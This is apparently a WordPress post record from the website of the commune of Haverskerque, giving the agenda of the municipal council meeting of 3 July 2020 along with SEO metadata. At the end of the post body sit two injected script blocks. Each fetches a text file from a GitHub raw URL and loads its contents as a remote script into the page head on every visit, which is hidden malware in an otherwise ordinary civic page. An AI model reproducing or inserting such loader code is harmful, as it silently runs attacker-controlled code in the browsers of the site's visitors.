{"id":685,"date":"2020-07-04T17:37:00","date_gmt":"2020-07-04T15:37:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=685"},"modified":"2024-07-29T06:39:22","modified_gmt":"2024-07-29T04:39:22","slug":"conseil-municipal-du-03-juillet-2020","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/","title":{"rendered":"Conseil Municipal du 03 Juillet 2020"},"content":{"rendered":"\n<p>ORDRE DU JOUR&nbsp;:<\/p>\n\n\n\n<p>1. Approbation du proc\u00e8s-verbal de la s\u00e9ance du 10 Juin 2020\u00a0;<br>2. Indemnit\u00e9 des \u00e9lus\u00a0;<br><em>Modification de la d\u00e9lib\u00e9ration pour ajout du caract\u00e8re r\u00e9troactif de la d\u00e9lib\u00e9ration \u00e0 la prise de fonction des \u00e9lus (Mme\u00a0le Maire le 24 Mai, Adjoints le 25 Mai, CMD le 30 Mai<\/em><br>3. Personnel communal. Recrutement d\u2019emplois saisonniers pour les ALSH\u00a0;<br><em>Modification du nombre de postes<\/em><br>4. Communaut\u00e9 de communes Flandre Lys. Acc\u00e8s des \u00e9tablissements scolaires au Centre Aquatique l\u2019Ondine &#8211; Convention de prise en charge des s\u00e9ances de natation et du transport et ajout d\u2019un niveau\u00a0;<br>5. Communaut\u00e9 de communes Flandre Lys. Signature de conventions culturelles\u00a0:<br>a. Journ\u00e9es europ\u00e9ennes du Patrimoine 2020<br>b. Conteurs en campagne 2020<br>c. Esperluf\u00eate<br>d. Caf\u00e9 \u00e0 th\u00e8mes<br>6. Travaux rues du 11 Novembre et du 8 Mai 1945. Convention entre la commune, le D\u00e9partement et le Syndicat Intercommunal d\u2019\u00c9lectrification des Communes de Flandre\u00a0;<br>7. Informations du Maire sur les d\u00e9cisions prises ai titre des d\u00e9l\u00e9gations confi\u00e9es par le conseil municipal\u00a0;<br>8. Questions diverses.<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2409\"  _slug=\"compte-rendu-du-conseil-municipal-du-03-juillet-2020\" data-title=\"compte-rendu-du-conseil-municipal-du-03-juillet-2020\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte rendu du Conseil Municipal du 03 Juillet 2020<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2409 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/compte_rendu_du_conseil_municipal_du_03_juillet_2020.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR&nbsp;: 1. Approbation du proc\u00e8s-verbal de la s\u00e9ance du 10 Juin 2020\u00a0;2. Indemnit\u00e9 des \u00e9lus\u00a0;Modification de la d\u00e9lib\u00e9ration pour ajout du caract\u00e8re r\u00e9troactif de la d\u00e9lib\u00e9ration \u00e0 la prise de fonction des \u00e9lus (Mme\u00a0le Maire le 24 Mai, Adjoints le 25 Mai, CMD le 30 Mai3. Personnel communal. Recrutement d\u2019emplois saisonniers pour les ALSH\u00a0;Modification du nombre de postes4. Communaut\u00e9 de communes Flandre Lys. Acc\u00e8s des \u00e9tablissements scolaires au Centre Aquatique l\u2019Ondine &#8211; Convention de prise en charge des s\u00e9ances de natation et du transport et ajout d\u2019un niveau\u00a0;5. Communaut\u00e9 de communes Flandre Lys. Signature de conventions culturelles\u00a0:a. Journ\u00e9es europ\u00e9ennes du Patrimoine 2020b. Conteurs en campagne 2020c. Esperluf\u00eated. Caf\u00e9 \u00e0 th\u00e8mes6. Travaux rues du 11 Novembre et du 8 Mai 1945. Convention entre la commune, le D\u00e9partement et le Syndicat Intercommunal d\u2019\u00c9lectrification des Communes de Flandre\u00a0;7. Informations du Maire sur les d\u00e9cisions prises ai titre des d\u00e9l\u00e9gations confi\u00e9es par le conseil municipal\u00a0;8. Questions diverses.<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-685","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR&nbsp;: 1. Approbation du proc\u00e8s-verbal de la s\u00e9ance du 10 Juin 2020\u00a0;2. Indemnit\u00e9 des \u00e9lus\u00a0;Modification de la d\u00e9lib\u00e9ration pour ajout du caract\u00e8re r\u00e9troactif de la d\u00e9lib\u00e9ration \u00e0 la prise de fonction des \u00e9lus (Mme\u00a0le Maire le 24 Mai, Adjoints le 25 Mai, CMD le 30 Mai3. Personnel communal. Recrutement d\u2019emplois saisonniers pour les ALSH\u00a0;Modification du nombre de postes4. Communaut\u00e9 de communes Flandre Lys. Acc\u00e8s des \u00e9tablissements scolaires au Centre Aquatique l\u2019Ondine &#8211; Convention de prise en charge des s\u00e9ances de natation et du transport et ajout d\u2019un niveau\u00a0;5. Communaut\u00e9 de communes Flandre Lys. Signature de conventions culturelles\u00a0:a. Journ\u00e9es europ\u00e9ennes du Patrimoine 2020b. Conteurs en campagne 2020c. Esperluf\u00eated. Caf\u00e9 \u00e0 th\u00e8mes6. Travaux rues du 11 Novembre et du 8 Mai 1945. Convention entre la commune, le D\u00e9partement et le Syndicat Intercommunal d\u2019\u00c9lectrification des Communes de Flandre\u00a0;7. Informations du Maire sur les d\u00e9cisions prises ai titre des d\u00e9l\u00e9gations confi\u00e9es par le conseil municipal\u00a0;8. Questions diverses.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2020-07-04T15:37:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 03 Juillet 2020\",\"datePublished\":\"2020-07-04T15:37:00+00:00\",\"dateModified\":\"2024-07-29T04:39:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/\"},\"wordCount\":183,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/\",\"name\":\"Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2020-07-04T15:37:00+00:00\",\"dateModified\":\"2024-07-29T04:39:22+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2020\\\/07\\\/04\\\/conseil-municipal-du-03-juillet-2020\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 03 Juillet 2020\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR&nbsp;: 1. Approbation du proc\u00e8s-verbal de la s\u00e9ance du 10 Juin 2020\u00a0;2. Indemnit\u00e9 des \u00e9lus\u00a0;Modification de la d\u00e9lib\u00e9ration pour ajout du caract\u00e8re r\u00e9troactif de la d\u00e9lib\u00e9ration \u00e0 la prise de fonction des \u00e9lus (Mme\u00a0le Maire le 24 Mai, Adjoints le 25 Mai, CMD le 30 Mai3. Personnel communal. Recrutement d\u2019emplois saisonniers pour les ALSH\u00a0;Modification du nombre de postes4. Communaut\u00e9 de communes Flandre Lys. Acc\u00e8s des \u00e9tablissements scolaires au Centre Aquatique l\u2019Ondine &#8211; Convention de prise en charge des s\u00e9ances de natation et du transport et ajout d\u2019un niveau\u00a0;5. Communaut\u00e9 de communes Flandre Lys. Signature de conventions culturelles\u00a0:a. Journ\u00e9es europ\u00e9ennes du Patrimoine 2020b. Conteurs en campagne 2020c. Esperluf\u00eated. Caf\u00e9 \u00e0 th\u00e8mes6. Travaux rues du 11 Novembre et du 8 Mai 1945. Convention entre la commune, le D\u00e9partement et le Syndicat Intercommunal d\u2019\u00c9lectrification des Communes de Flandre\u00a0;7. Informations du Maire sur les d\u00e9cisions prises ai titre des d\u00e9l\u00e9gations confi\u00e9es par le conseil municipal\u00a0;8. Questions diverses.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2020-07-04T15:37:00+00:00","article_modified_time":"2024-07-29T04:39:22+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 03 Juillet 2020","datePublished":"2020-07-04T15:37:00+00:00","dateModified":"2024-07-29T04:39:22+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/"},"wordCount":183,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/","name":"Conseil Municipal du 03 Juillet 2020 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2020-07-04T15:37:00+00:00","dateModified":"2024-07-29T04:39:22+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2020\/07\/04\/conseil-municipal-du-03-juillet-2020\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 03 Juillet 2020"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=685"}],"version-history":[{"count":5,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions"}],"predecessor-version":[{"id":8314,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions\/8314"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=685"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=685"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}